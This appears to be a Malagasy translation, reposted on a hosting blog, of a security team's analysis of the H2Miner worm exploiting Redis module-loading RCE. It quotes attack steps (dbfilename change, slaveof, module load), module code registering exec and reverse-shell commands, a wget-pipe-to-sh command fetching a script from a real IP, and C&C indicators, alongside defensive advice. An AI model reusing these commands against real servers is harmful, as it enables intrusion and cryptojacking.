ProHoster > Blog > fitantanan-draharaha > Nisy fipoahana vaovao momba ny kankana H2Miner hita fa manararaotra ny Redis RCE

Nisy fipoahana vaovao momba ny kankana H2Miner hita fa manararaotra ny Redis RCE

Indray andro lasa izay, notafihan'ny kankana mitovy amin'izany ny iray amin'ireo mpizara tetikasako. Raha mitady valiny amin'ny fanontaniana hoe "inona izany?" Nahita lahatsoratra mahafinaritra avy amin'ny ekipan'ny Alibaba Cloud Security aho. Satria tsy hitako tao amin'ny HabrΓ© ity lahatsoratra ity dia nanapa-kevitra ny handika azy manokana ho anao aho <3

teny

Vao haingana, ny ekipan'ny fiarovana Alibaba Cloud dia nahita fipoahana tampoka ny H2Miner. Ity karazana kankana mampidi-doza ity dia mampiasa ny tsy fisian'ny fanomezan-dΓ lana na ny tenimiafina malemy ho an'i Redis ho vavahadin'ny rafitrao, aorian'izay dia mampifanaraka ny maodely ratsy azy manokana amin'ny andevo amin'ny alΓ lan'ny fandrindrana ny andevo tompony ary farany dia misintona ity mΓ΄dely ratsy ity amin'ny milina voatafika ary manatanteraka ratsy. toromarika.

Taloha, ny fanafihana amin'ny rafitrao dia natao voalohany indrindra tamin'ny fampiasana fomba misy asa voalahatra na fanalahidy SSH izay nosoratana tamin'ny milinanao taorian'ny nidiran'ny mpanafika tao amin'ny Redis. Soa ihany fa tsy azo ampiasaina matetika io fomba io noho ny olana amin'ny fanaraha-maso ny fahazoan-dΓ lana na noho ny dikan-teny samihafa. Na izany aza, ity fomba fametahana maody ratsy ity dia afaka manatanteraka mivantana ny baikon'ny mpanafika na mahazo miditra amin'ny akorandriaka, izay mampidi-doza ho an'ny rafitrao.

Noho ny habetsahan'ny mpizara Redis nampiantranoina amin'ny Internet (eo ho eo amin'ny 1 tapitrisa), ny ekipan'ny fiarovana an'ny Alibaba Cloud, ho fampahatsiahivana am-pirahalahiana, dia manoro hevitra ny mpampiasa mba tsy hizara an'i Redis amin'ny Internet ary hanamarina tsy tapaka ny tanjaky ny tenimiafina ary raha toa ka voahitsakitsaka izy ireo. safidy haingana.

H2Miner

H2Miner dia botnet fitrandrahana harena ankibon'ny tany ho an'ny rafitra mifototra amin'ny Linux izay afaka manafika ny rafitrao amin'ny fomba isan-karazany, ao anatin'izany ny tsy fisian'ny fanomezan-dΓ lana amin'ny Hadoop yarn, Docker, ary Redis remote command execution (RCE) vulnerability. Ny botnet dia miasa amin'ny alΓ lan'ny fampidinana scripts sy malware mba hitrandrahana ny angonao, hanitarana ny fanafihana mitsivalana, ary hitazona ny fifandraisana amin'ny baiko sy fanaraha-maso (C&C).

Redis RCE

Ny fahalalana momba an'io lohahevitra io dia nozarain'i Pavel Toporkov tao amin'ny ZeroNights 2018. Taorian'ny version 4.0, Redis dia manohana ny endri-pandefasana plug-in izay manome ny mpampiasa ny fahafaha-mitondra ka ny rakitra natambatra miaraka amin'ny C ao amin'ny Redis mba hanatanteraka baiko Redis manokana. Ity fiasa ity, na dia ilaina aza, dia misy vulnerable izay, amin'ny maodely master-slave, ny rakitra dia azo ampifandraisina amin'ny andevo amin'ny alΓ lan'ny mode fullresync. Ity dia azo ampiasaina amin'ny mpanafika mba hamindrana rakitra ratsy toy izany. Rehefa vita ny fifindrana dia apetaka amin'ny ohatra Redis voatafika ny mpanafika ary manatanteraka baiko rehetra.

Malware Worm Analysis

Vao haingana, ny ekipan'ny fiarovana Alibaba Cloud dia nahita fa nitombo tampoka ny haben'ny vondrona mpitrandraka ratsy fanahy H2Miner. Araka ny fanadihadiana dia toy izao manaraka izao ny dingana ankapobeny amin'ny fisehoan'ny fanafihana:

Nisy fipoahana vaovao momba ny kankana H2Miner hita fa manararaotra ny Redis RCE

H2Miner dia mampiasa RCE Redis amin'ny fanafihana feno. Ny mpanafika voalohany dia manafika ireo mpizara Redis tsy voaaro na ireo mpizara miaraka amin'ny tenimiafina malemy.

Avy eo dia mampiasa ny baiko izy ireo config set dbfilename red2.so hanova ny anaran'ny rakitra. Aorian'izany dia manatanteraka ny baiko ireo mpanafika slaveof hametraka ny adiresy mpampiantrano replication master-slave.

Rehefa mametraka fifandraisana master-andevo miaraka amin'ny Redis ratsy izay an'ny mpanafika ilay ohatra Redis voatafika, dia alefan'ilay mpanafika ilay maody voan'ny aretina mampiasa ny baiko fullresync mba hampifanaraka ireo rakitra. Ny rakitra red2.so dia halefa any amin'ny milina voatafika. Ny mpanafika avy eo dia mampiasa ny ./red2.so loading module mba hampidirana ity rakitra ity. Ny maody dia afaka manatanteraka baiko avy amin'ny mpanafika na manomboka fifandraisana mivadika (backdoor) hahazoana fidirana amin'ny milina voatafika.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Rehefa avy nanatanteraka baiko ratsy toy ny / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ny mpanafika dia hamerina ny anaran'ny rakitra backup ary hamoaka ny maody rafitra hanadiovana ny dian. Na izany aza, ny rakitra red2.so dia mbola hijanona ao amin'ny milina voatafika. Manoro hevitra ny mpampiasa mba handinika ny fisian'ny rakitra mampiahiahy toy izany ao amin'ny lahatahiry misy ny ohatra Redis.

Ho fanampin'ny famonoana ireo dingana ratsy sasany hangalarana loharanon-karena, ny mpanafika dia nanaraka script ratsy tamin'ny alΓ lan'ny fampidinana sy famonoana ireo rakitra binary maloto 142.44.191.122/kinsing. Midika izany fa ny anaran'ny dingana na ny anaran'ny lahatahiry misy kinsing ao amin'ny mpampiantrano dia mety manondro fa io milina io dia voan'ny virus.

Araka ny valin'ny reverse engineering, ny malware dia manao ireto asa manaraka ireto:

  • Mampakatra rakitra sy manatanteraka azy ireo
  • harena ankibon'ny tany
  • Mitazona ny fifandraisana C&C ary manatanteraka baiko mpanafika

Nisy fipoahana vaovao momba ny kankana H2Miner hita fa manararaotra ny Redis RCE

MampiasΓ  masscan ho an'ny fitarafana ivelany mba hanitarana ny herinao. Ankoatra izany, ny adiresy IP an'ny mpizara C&C dia voasokajy mafy ao amin'ny programa, ary ny mpampiantrano voatafika dia hifandray amin'ny mpizara serasera C&C amin'ny fampiasana ny fangatahana HTTP, izay ahitana ny fampahalalana momba ny zombie (server kompromisy) ao amin'ny lohatenin'ny HTTP.

Nisy fipoahana vaovao momba ny kankana H2Miner hita fa manararaotra ny Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Fomba fanafihana hafa

Nisy fipoahana vaovao momba ny kankana H2Miner hita fa manararaotra ny Redis RCE

Adiresy sy rohy ampiasain'ny kankana

/kinsing

β€’ 142.44.191.122/t.sh
β€’ 185.92.74.42/h.sh
β€’ 142.44.191.122/spr.sh
β€’ 142.44.191.122/spre.sh
β€’ 195.3.146.118/unk.sh

s&c

β€’ 45.10.88.102
β€’ 91.215.169.111
β€’ 139.99.50.255
β€’ 46.243.253.167
β€’ 195.123.220.193

Filan-kevitra

Voalohany, tsy tokony hidirana amin'ny Internet ny Redis ary tokony harovana amin'ny tenimiafina matanjaka. Zava-dehibe ihany koa ny manamarina ny mpanjifa fa tsy misy rakitra red2.so ao amin'ny lahatahiry Redis ary tsy misy "kinsing" ao amin'ny anaran'ny rakitra/process amin'ny mpampiantrano.

Source: www.habr.com

Add a comment